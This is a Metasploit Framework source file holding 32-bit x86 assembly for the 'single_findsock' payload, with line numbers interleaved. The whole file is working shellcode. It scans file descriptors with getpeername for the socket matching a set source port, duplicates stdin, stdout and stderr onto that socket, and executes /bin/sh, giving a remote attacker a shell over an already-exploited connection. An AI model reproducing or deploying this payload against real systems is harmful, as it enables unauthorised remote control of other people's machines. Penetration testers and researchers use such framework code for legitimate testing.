1
;
2
;
3
;        Name: single_findsock
4
;   Qualities: Nothing Special
5
;     Authors: vlad902 <vlad902 [at] gmail.com>
6
;     Version: $Revision: 1846 $
7
;     License:
8
;
9
;        This file is part of the Metasploit Exploit Framework
10
;        and is subject to the same licenses and copyrights as
11
;        the rest of this package.
12
;
13
; Description:
14
;
15
;	This payload redirects /bin/sh to a socket connected from a 
16
;	certain source port.
17
;
18
;;
19

20

21
BITS 32
22

23
section .text
24
global main
25

26
main:
27
  xor	edi, edi
28
  push	edi
29
  mov	ebp, esp
30

31
getpeername_loop:
32
; 32-bit is okay since the connection should be established already.
33
  inc	edi
34

35
  mov	esp, ebp
36
  push	byte 0x10
37
  push	esp
38
  push	ebp
39
  push	edi
40
  push	byte 0x1f 
41
  pop	eax
42
  push	byte 0x02
43
  int	0x80
44

45
  cmp	word [ebp + 2], 0x5c11
46
  jne	getpeername_loop
47

48
  pop	ecx
49

50
dup2_loop:
51
  push	ecx
52
  push	edi
53
  push	byte 0x5a 
54
  pop	eax
55
  push	ecx
56
  int	0x80
57
  dec	ecx
58
  jns	dup2_loop
59

60
  push	0x68732f2f
61
  push	0x6e69622f 
62

63
  mov	ebx, esp
64

65
  push	eax
66
  push	esp
67
  push	ebx
68

69
  mov	al, 0x3b
70
  push	eax
71
  int	0x80
72

73